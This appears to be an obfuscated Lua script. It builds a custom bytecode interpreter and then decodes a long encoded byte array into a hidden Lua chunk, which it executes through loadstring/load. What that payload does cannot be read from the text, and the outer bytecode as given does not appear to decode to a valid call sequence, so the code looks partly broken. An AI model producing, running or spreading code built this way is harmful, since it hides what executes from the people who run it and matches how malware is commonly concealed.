

local function _VM_INTERPRET(bytecode, constants, globals)
  local stack = {}
  local sp = 0
  local vars = {}
  local pc = 1
  
  local function push(v) sp = sp + 1; stack[sp] = v end
  local function pop() local v = stack[sp]; stack[sp] = nil; sp = sp - 1; return v end
  local function peek() return stack[sp] end
  
  while pc <= #bytecode do
    local op = bytecode[pc]
    pc = pc + 1
    
    if op == 0x01 then
      local idx = bytecode[pc]; pc = pc + 1
      push(constants[idx])
    elseif op == 0x02 then
      local idx = bytecode[pc]; pc = pc + 1
      push(vars[idx])
    elseif op == 0x03 then
      local idx = bytecode[pc]; pc = pc + 1
      vars[idx] = pop()
    elseif op == 0x04 then
      local b, a = pop(), pop()
      push((tonumber(a) or 0) + (tonumber(b) or 0))
    elseif op == 0x05 then
      local b, a = pop(), pop()
      push((tonumber(a) or 0) - (tonumber(b) or 0))
    elseif op == 0x06 then
      local b, a = pop(), pop()
      push((tonumber(a) or 0) * (tonumber(b) or 0))
    elseif op == 0x07 then
      local b, a = pop(), pop()
      push((tonumber(a) or 0) / (tonumber(b) or 0))
    elseif op == 0x08 then
      local b, a = pop(), pop()
      push(tostring(a) .. tostring(b))
    elseif op == 0x09 then
      local nargs = bytecode[pc]; pc = pc + 1
      local args = {}
      for i = nargs, 1, -1 do args[i] = pop() end
      local fn = pop()
      if type(fn) == "function" then
        local results = {fn(unpack(args))}
        for i, v in ipairs(results) do push(v) end
      end
    elseif op == 0x0A then
      local nrets = bytecode[pc]; pc = pc + 1
      local rets = {}
      for i = nrets, 1, -1 do rets[i] = pop() end
      return unpack(rets)
    elseif op == 0x0B then
      local offset = bytecode[pc]; pc = pc + 1
      pc = offset
    elseif op == 0x0C then
      local offset = bytecode[pc]; pc = pc + 1
      if pop() then pc = offset end
    elseif op == 0x0D then
      local idx = bytecode[pc]; pc = pc + 1
      push(constants[idx])
    elseif op == 0x0F then
      push(peek())
    elseif op == 0x10 then
      print(pop())
    elseif op == 0x11 then
      push(nil)
    elseif op == 0x12 then
      push(true)
    elseif op == 0x13 then
      push(false)
    elseif op == 0x1A then
      local idx = bytecode[pc]; pc = pc + 1
      local name = constants[idx]
      push(globals[name] or _G[name])
    elseif op == 0xFF then
      local idx = bytecode[pc]; pc = pc + 1
      local code = constants[idx]
      local fn = (loadstring or load)(code)
      if fn then push(fn()) end
    end
  end
end


local _KEY_qz5a6c = 83
local _BC_wztw34 = {82, 85, 95, 86}
local _CONST_xfveh8 = {"\nlocal _key_vleqb9 = 110\nlocal _data_mr13em = {120,121,220,224,213,212,224,149,213,216,230,237,227,218,224,226,224,244,231,161,191,163,172,235,251,245,235,253,243,250,250,181,183,153,176,177,254,2,247,246,2,183,252,250,8,2,1,15,13,20,19,193,223,195,31,199,10,12,10,30,17,205,216,205,208,25,25,37,212,223,212,215,28,29,33,219,55,197,220,221,36,46,50,225,33,239,228,51,39,52,45,233,51,57,236,54,62,48,57,67,69,251,56,54,68,62,61,75,73,80,79,6,254,67,79,235,2,3,4,5,79,77,8,72,49,70,90,78,91,84,77,17,102,91,89,99,0,23,24,25,26,27,28,105,109,98,97,109,34,112,120,37,67,39,111,110,126,120,113,129,111,131,113,115,126,120,60,116,93,114,134,122,135,128,121,70,40,63,64,65,66,67,68,142,140,71,149,157,74,159,148,146,156,57,80,81,82,83,84,85,86,87,170,154,177,174,161,177,102,172,180,109,98,101,163,164,175,181,172,174,194,109,120,109,180,196,190,180,198,188,195,195,126,128,120,203,191,207,209,207,204,127,206,202,206,131,201,211,202,144,114,137,138,139,140,141,142,143,144,227,211,234,231,218,234,159,229,237,166,155,158,220,221,237,229,248,235,241,232,234,254,169,180,169,240,0,250,240,2,248,255,255,186,188,180,250,4,251,193,163,186,187,188,189,190,191,5,15,6,173,196,197,198,199,13,23,14,181,204,205,19,29,20,187,210,211,190,213,214,35,39,28,27,39,220,44,48,40,39,32,52,40,53,58,47,57,45,233,7,235,62,50,63,68,57,67,55,221,244,245,63,61,248,72,76,68,67,60,80,68,81,86,75,85,73,5,90,79,77,87,244,11,12,13,14,97,81,104,101,88,104,29,85,62,36,25,28,109,97,110,115,104,114,102,36,47,36,107,123,117,107,125,115,122,122,53,123,126,116,58,28,51,52,53,54,55,56,127,137,141,60,124,74,63,132,65,139,145,68,142,150,136,145,155,157,83,144,142,156,150,149,163,161,168,167,94,86,155,167,67,90,91,92,93,94,95,96,97,171,169,100,178,181,171,130,181,185,194,177,191,118,120,138,183,187,193,184,125,186,128,120,205,194,192,202,103,126,127,128,129,130,131,132,133,134,135,218,206,222,224,222,219,142,221,217,221,124,147,148,149,150,151,152,153,154,224,234,225,136,159,160,161,162,163,164,234,244,235,146,169,170,171,172,173,174,1,245,5,7,5,2,181,5,9,1,0,249,13,1,14,19,8,18,6,202,16,19,9,207,177,200,201,202,203,17,27,18,216,186,209,210,24,34,25,192,28,38,29,227,227,229,199,200,201,44,48,37,36,48,229,37,55,58,56,62,48,47,65,45,53,69,63,53,71,61,68,68,74,248,22,250,3,66,82,76,66,84,74,81,81,12,14,240,7,8,85,89,78,77,89,14,95,98,96,102,88,87,105,91,91,24,54,26,118,6,29,30,31,32,35,110,114,101,105,121,123,122,114,120,114,46,57,46,49,124,128,115,119,54,65,54,57,124,136,128,132,136,130,64,75,64,67,142,146,133,137,140,144,148,142,76,87,54,77,78,79,80,83,165,152,168,155,155,165,174,91,102,91,94,164,163,179,166,166,176,185,102,113,102,105,172,174,172,192,179,111,122,111,114,196,198,197,189,195,189,133,188,206,199,203,126,103,126,127,221,107,130,131,110,133,134,211,215,204,203,215,140,220,224,216,215,218,224,212,224,232,150,180,152,244,247,133,156,157,228,238,242,161,225,175,164,243,231,244,237,169,243,249,172,246,254,240,249,3,5,187,4,7,5,11,253,252,14,0,0,198,190,3,15,171,194,195,196,197,18,22,11,10,22,203,28,14,32,35,35,209,239,211,47,50,192,215,216,217,218,33,43,47,222,47,33,51,54,227,45,51,230,53,41,54,47,5,51,58,47,67,51,57,250,245,47,51,4,52,3,251,3,251,64,76,232,255,0,1,2,3,4,89,71,73,84,78,24,84,90,96,83,97,100,25,98,84,102,105,105,35,24,105,91,109,112,38,8,31,32,33,34,104,114,105,16,39,40,41,42,21,44,45,46,47,124,128,117,116,128,53,133,121,130,57,87,59,123,100,40,63,64,65,66,137,147,151,70,144,72,102,74,92,88,77,81,159,145,163,166,166,84,98,86,104,88,157,169,69,92,93,94,95,96,97,177,165,174,101,131,103,183,171,180,166,188,174,192,195,195,172,187,176,177,95,118,119,120,121,122,123,197,195,126,205,207,213,130,210,198,207,134,219,208,206,216,139,206,223,211,208,219,145,215,225,216,127,150,151,152,153,223,233,224,135,158,159,160,161,140,163,164,165,166,240,238,169,249,237,246,173,239,253,244,177,6,12,4,250,190,6,250,3,195,187,217,218,190,193,20,2,4,15,9,199,198,27,16,14,24,181,204,205,206,207,208,209,33,37,29,28,31,37,25,37,45,22,42,30,43,36,29,225,255,227,51,39,48,34,56,42,60,63,63,40,241,63,49,67,70,70,49,50,224,247,248,249,250,64,74,65,232,255,0,70,80,71,238,5,6,241,8,9,92,80,96,98,96,93,16,96,100,92,91,94,100,88,100,108,4,96,106,97,39,39,41,11,12,13,112,116,105,104,116,41,105,116,122,129,115,118,130,122,134,140,115,118,143,79,135,131,133,59,89,61,70,133,149,143,133,151,141,148,148,79,81,51,74,75,152,156,145,144,156,81,151,171,164,154,153,171,157,157,90,120,92,110,113,112,112,119,121,124,124,119,120,81,104,105,84,107,108,185,189,178,177,189,114,185,201,195,185,203,193,200,200,123,191,197,195,194,203,137,139,109,132,133,134,135,212,216,205,204,216,141,215,221,214,224,146,176,148,217,219,217,237,224,154,220,234,225,158,227,229,227,247,234,178,236,235,251,241,247,240,250,172,238,252,243,176,245,247,245,9,252,196,254,253,13,3,9,2,12,198,208,201,193,17,21,196,32,35,177,200,201,202,203,21,19,206,24,30,23,33,225,39,36,43,41,27,30,218,28,42,33,222,40,46,39,49,241,55,52,59,57,43,46,4,49,53,59,50,247,242,17,244,252,244,73,62,60,70,227,250,251,252,253,254,255,82,70,86,88,86,83,6,91,90,94,79,245,12,13,14,15,85,95,86,253,20,21,22,23,106,94,110,112,110,107,30,115,114,118,103,13,36,37,107,117,108,19,42,43,22,45,46,120,118,49,128,130,136,53,121,127,125,124,133,67,69,61,146,135,133,143,44,67,68,69,70,158,144,146,150,144,76,161,160,164,149,81,150,162,84,154,164,155,66,89,90,160,170,161,72,95,96,75,98,99,182,170,186,188,186,183,106,191,190,194,179,89,181,191,182,124,124,126,96,97,98,197,201,190,189,201,126,190,197,207,216,194,212,215,213,219,205,204,222,139,169,141,150,213,229,223,213,231,221,228,228,159,161,131,154,155,232,236,225,224,236,161,225,242,246,238,237,240,246,234,246,234,211,173,203,175,11,14,156,179,180,251,5,9,184,4,198,187,18,189,7,13,192,17,3,12,22,24,206,6,239,210,202,15,27,183,206,207,208,209,17,34,38,30,29,32,38,26,38,26,3,24,41,28,224,254,226,57,206,229,230,44,54,45,212,235,236,215,238,239,67,54,70,64,57,73,55,75,57,59,70,64,4,60,37,11,0,92,236,3,4,5,6,70,71,87,79,98,85,91,82,84,104,17,47,19,90,106,100,90,108,98,105,105,36,113,42,31,107,45,34,121,45,15,38,39,40,41,42,43,117,115,46,110,127,131,123,122,125,131,119,131,119,96,117,134,121,61,156,92,64,143,139,143,68,134,148,139,72,157,163,155,145,85,141,158,162,154,153,156,162,150,162,150,127,148,165,152,101,93,123,124,96,99,168,184,178,168,186,176,183,183,108,107,192,181,179,189,90,113,114,115,116,117,118,119,120,203,191,207,209,207,204,105,128,129,130,131,132,133,203,213,204,115,138,139,140,141,142,143,226,210,233,230,217,233,158,235,164,153,229,167,156,243,167,137,160,161,162,163,233,243,234,145,168,169,7,180,150,242,252,243,185,185,187,157,158,159,2,6,251,250,6,187,251,13,16,14,20,6,5,23,9,9,5,20,9,18,24,203,233,205,214,21,37,31,21,39,29,36,36,223,225,195,218,219,40,44,33,32,44,225,33,49,51,53,37,42,66,51,3,56,49,6,68,239,13,241,5,12,15,245,66,70,59,58,70,251,59,82,76,84,83,70,70,66,92,90,31,97,26,87,87,76,12,42,14,78,94,96,98,82,87,111,96,48,101,94,51,113,28,39,30,49,10,33,34,105,115,119,38,102,125,119,127,126,113,113,109,134,133,121,120,140,122,120,71,84,73,69,75,59,128,140,62,139,143,132,131,143,68,132,70,100,72,136,159,153,161,160,147,147,143,168,167,155,154,174,156,154,105,89,159,169,160,71,94,95,166,176,180,99,163,186,180,188,187,174,174,170,181,197,126,182,184,129,134,136,145,134,130,136,120,189,201,123,200,204,193,192,204,129,193,131,161,133,197,220,214,222,221,208,208,204,215,231,160,216,218,163,168,170,150,220,230,221,132,155,156,237,240,232,238,245,170,171,234,250,244,234,252,242,249,249,180,236,3,191,192,193,194,247,245,193,245,199,16,207,204,212,208,214,208,208,213,5,4,204,16,20,9,8,20,201,9,219,36,17,225,228,22,233,234,23,231,25,238,244,218,219,32,42,46,221,29,239,56,241,251,244,251,42,39,45,250,45,3,8,253,249,241,46,69,1,2,3,4,57,55,247,60,72,250,58,12,85,66,18,21,71,26,27,72,24,74,31,37,72,26,99,80,32,35,85,40,41,86,38,88,45,36,37,107,109,108,100,106,100,44,98,104,98,116,43,44,100,123,55,56,57,58,111,109,104,109,63,136,65,75,68,75,122,119,125,74,125,83,120,73,124,78,151,86,83,91,87,93,87,87,92,140,139,85,93,97,99,87,84,98,102,104,92,153,163,154,87,170,158,174,176,174,171,94,158,112,185,166,118,121,171,126,127,172,124,174,131,108,178,188,179,121,121,205,132,137,134,130,136,140,145,134,140,145,146,138,144,149,150,142,148,153,157,227,147,156,160,147,148,118,141,142,213,223,227,146,210,234,228,223,219,215,228,236,226,224,244,232,234,233,190,179,175,183,165,234,246,168,245,249,238,237,249,174,238,176,206,178,242,10,4,255,251,247,4,12,2,0,20,8,10,9,193,7,17,8,175,198,199,20,24,13,12,24,205,13,29,31,33,17,41,23,41,44,42,30,48,46,219,249,221,246,242,251,225,46,50,39,38,50,231,39,48,45,42,62,4,56,48,53,75,64,56,244,18,246,54,70,72,74,58,82,64,82,85,83,71,89,87,4,15,6,25,242,78,88,79,21,247,248,91,95,84,83,95,20,84,105,108,91,92,95,110,111,41,30,94,114,102,117,120,112,121,38,68,40,121,109,108,120,121,54,110,128,131,129,135,121,120,138,124,124,120,135,124,133,139,71,41,137,135,66,145,147,153,70,134,155,158,141,142,145,160,161,79,164,153,151,161,62,85,86,169,157,173,175,173,170,93,172,168,172,75,167,177,168,79,184,172,188,190,188,185,108,172,192,180,195,198,190,199,94}\nlocal _bc_w53fjc = function(t, k)\n  local s = \"\"\n  for i = 1, #t do\n    s = s .. string.char((t[i] - k - i + 256 * 2) % 256)\n  end\n  return s\nend\nlocal _result_lcs1pp = _bc_w53fjc(_data_mr13em, _key_vleqb9)\nreturn (loadstring or load)(_result_lcs1pp)()\n"}

local _DEC_v5vp24 = function(bc, k)
  local r = {}
  for i = 1, #bc do
    r[i] = (bc[i] - k - i + 256 * 2) % 256
  end
  return r
end

return _VM_INTERPRET(_DEC_v5vp24(_BC_wztw34, _KEY_qz5a6c), _CONST_xfveh8, _G)
